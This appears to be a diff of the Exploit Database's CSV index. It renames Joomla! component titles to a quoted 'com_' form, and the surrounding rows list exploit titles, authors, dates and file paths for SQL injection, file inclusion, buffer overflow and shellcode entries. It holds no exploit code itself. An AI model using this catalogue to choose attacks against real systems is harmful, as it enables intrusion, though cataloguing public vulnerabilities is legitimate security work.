 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
-15791,platforms/php/webapps/15791.txt,"Joomla! Component Jotloader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
+15791,platforms/php/webapps/15791.txt,"Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
 15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0
 15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
@@ -13731,7 +13731,7 @@ id,file,description,date,author,platform,type,port
 15798,platforms/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
 15799,platforms/php/webapps/15799.txt,"Habari Blog - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
 15800,platforms/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
-15801,platforms/php/webapps/15801.txt,"Joomla! Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0
+15801,platforms/php/webapps/15801.txt,"Joomla! Component 'com_xgallery' 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0
 15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0
 15805,platforms/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0
 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0
@@ -13743,18 +13743,18 @@ id,file,description,date,author,platform,type,port
 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0
 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,php,webapps,0
 15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15814,platforms/php/webapps/15814.txt,"Joomla! Component com_ponygallery - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15815,platforms/php/webapps/15815.txt,"Joomla! Component com_adsmanager - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15814,platforms/php/webapps/15814.txt,"Joomla! Component 'com_ponygallery' - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15815,platforms/php/webapps/15815.txt,"Joomla! Component 'com_adsmanager' - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15816,platforms/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0
 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion",2010-12-24,v3n0m,php,webapps,0
-15819,platforms/php/webapps/15819.txt,"Joomla! Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
+15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0
 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,windows,dos,0
 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0
 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
-15827,platforms/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
+15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0
 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0
 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0
@@ -13838,7 +13838,7 @@ id,file,description,date,author,platform,type,port
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
-15958,platforms/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0
+15958,platforms/php/webapps/15958.txt,"Joomla! Plugin 'Captcha' 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0
@@ -13863,7 +13863,7 @@ id,file,description,date,author,platform,type,port
 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
 15988,platforms/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0
-15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
+15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0
 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
@@ -13874,19 +13874,19 @@ id,file,description,date,author,platform,type,port
 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
-16001,platforms/php/webapps/16001.txt,"Joomla! Component People 1.0.0 - Local File Inclusion",2011-01-16,"ALTBTA ",php,webapps,0
+16001,platforms/php/webapps/16001.txt,"Joomla! Component 'com_people' 1.0.0 - Local File Inclusion",2011-01-16,"ALTBTA ",php,webapps,0
 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
-16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
+16010,platforms/php/webapps/16010.txt,"Joomla! Component 'com_allcinevid' 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
 16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - Unserialize()",2011-01-18,felix,php,webapps,0
 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps,0
 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0
 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0
 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,windows,local,0
 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0
-16039,platforms/php/webapps/16039.txt,"Joomla! Component B2 Portfolio 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",php,webapps,0
+16039,platforms/php/webapps/16039.txt,"Joomla! Component 'com_b2portfolio' 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",php,webapps,0
 16018,platforms/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
 16019,platforms/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps,0
 16021,platforms/windows/dos/16021.c,"Look n stop - Local Denial of Service",2011-01-21,Heurs,windows,dos,0
@@ -14066,7 +14066,7 @@ id,file,description,date,author,platform,type,port
 16243,platforms/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
 16244,platforms/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
-16246,platforms/php/webapps/16246.py,"Joomla! Component XCloner (com_xcloner-backupandrestore) - Remote Command Execution",2011-02-25,mr_me,php,webapps,0
+16246,platforms/php/webapps/16246.py,"Joomla! Component 'com_xcloner-backupandrestore' - Remote Command Execution",2011-02-25,mr_me,php,webapps,0
 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0
 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0
@@ -14798,7 +14798,7 @@ id,file,description,date,author,platform,type,port
 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",php,webapps,0
 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
-16995,platforms/php/webapps/16995.txt,"Joomla! Component com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
+16995,platforms/php/webapps/16995.txt,"Joomla! Component 'com_booklibrary' - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",windows,dos,0
 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0
 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote,0
@@ -14920,11 +14920,11 @@ id,file,description,date,author,platform,type,port
 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0
 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - Local File Inclusion",2011-04-07,Osirys,php,webapps,0
 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0
-17132,platforms/php/webapps/17132.py,"Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
+17132,platforms/php/webapps/17132.py,"Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0
 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
-17136,platforms/php/webapps/17136.txt,"Joomla! Component JCE (com_jce) - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
+17136,platforms/php/webapps/17136.txt,"Joomla! Component 'com_jce' - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
 17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
@@ -15024,8 +15024,8 @@ id,file,description,date,author,platform,type,port
 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps,0
 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0
-17264,platforms/php/webapps/17264.txt,"Joomla! Component com_versioning - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
-17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
+17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
+17265,platforms/php/webapps/17265.txt,"Joomla! Component 'com_hello' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0
 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0
@@ -15041,7 +15041,7 @@ id,file,description,date,author,platform,type,port
 17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Arbitrary File Upload",2011-05-14,"Number 7",php,webapps,0
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
-17288,platforms/php/webapps/17288.txt,"Joomla! Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0
+17288,platforms/php/webapps/17288.txt,"Joomla! Component 'com_question' - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0
 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0
 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0
 17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0
@@ -15056,7 +15056,7 @@ id,file,description,date,author,platform,type,port
 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0
 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
-17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 jDownloads - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
+17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
@@ -15082,9 +15082,9 @@ id,file,description,date,author,platform,type,port
 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps,0
 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps,0
 17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
-17338,platforms/php/webapps/17338.txt,"Joomla! Component com_jmsfileseller - Local File Inclusion",2011-05-28,Valentin,php,webapps,0
+17338,platforms/php/webapps/17338.txt,"Joomla! Component 'com_jmsfileseller' - Local File Inclusion",2011-05-28,Valentin,php,webapps,0
 17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
-17341,platforms/php/webapps/17341.txt,"Joomla! Component com_joomnik - SQL Injection",2011-05-29,SOLVER,php,webapps,0
+17341,platforms/php/webapps/17341.txt,"Joomla! Component 'com_joomnik' - SQL Injection",2011-05-29,SOLVER,php,webapps,0
 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps,0
@@ -15129,7 +15129,7 @@ id,file,description,date,author,platform,type,port
 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote,0
 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - Cross-Site Scripting Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
-17394,platforms/php/webapps/17394.txt,"Joomla! Plugin Scriptegrator 1.5 - File Inclusion",2011-06-13,jdc,php,webapps,0
+17394,platforms/php/webapps/17394.txt,"Joomla! Component 'Scriptegrator' 1.5 - File Inclusion",2011-06-13,jdc,php,webapps,0
 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
 17398,platforms/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0
@@ -15144,10 +15144,10 @@ id,file,description,date,author,platform,type,port
 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,php,webapps,0
 17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0
 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0
-17411,platforms/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
-17412,platforms/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0
+17411,platforms/php/webapps/17411.txt,"Joomla! Component 'com_acooldebate' 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
+17412,platforms/php/webapps/17412.txt,"Joomla! Component 'com_team' - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0
 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0
-17414,platforms/php/webapps/17414.txt,"Joomla! Component Calc Builder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0
+17414,platforms/php/webapps/17414.txt,"Joomla! Component 'com_calcbuilder' - 'id' Parameter Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0
 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0
 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0
 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,windows,remote,0
@@ -15177,7 +15177,7 @@ id,file,description,date,author,platform,type,port
 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0
 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0
 17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0
-17452,platforms/php/webapps/17452.txt,"Joomla! Component JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0
+17452,platforms/php/webapps/17452.txt,"Joomla! Component 'JoomlaXi' - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0
 17453,platforms/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0
 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0
 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0
@@ -15186,7 +15186,7 @@ id,file,description,date,author,platform,type,port
 17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 - EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",windows,dos,0
 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
 17463,platforms/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash (PoC)",2011-06-30,Caddy-Dz,linux,dos,0
-17464,platforms/php/webapps/17464.txt,"Joomla! Component mdigg - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0
+17464,platforms/php/webapps/17464.txt,"Joomla! Component 'mdigg' - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0
 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0
 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0
 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555
@@ -15241,11 +15241,11 @@ id,file,description,date,author,platform,type,port
 17522,platforms/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0
 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0
 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0
-17525,platforms/php/webapps/17525.txt,"Joomla! Component Xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0
+17525,platforms/php/webapps/17525.txt,"Joomla! Component 'com_xmap' 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0
 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0
 17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0
 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps,0
-17530,platforms/php/webapps/17530.txt,"Joomla! Component SOBI2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0
+17530,platforms/php/webapps/17530.txt,"Joomla! Component 'com_sobi2' 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0
 17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0
 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection",2011-07-14,LiquidWorm,php,webapps,0
 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0
@@ -15258,17 +15258,17 @@ id,file,description,date,author,platform,type,port
 17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
 17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0
-17553,platforms/php/webapps/17553.txt,"Joomla! Component Appointment Booking Pro - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
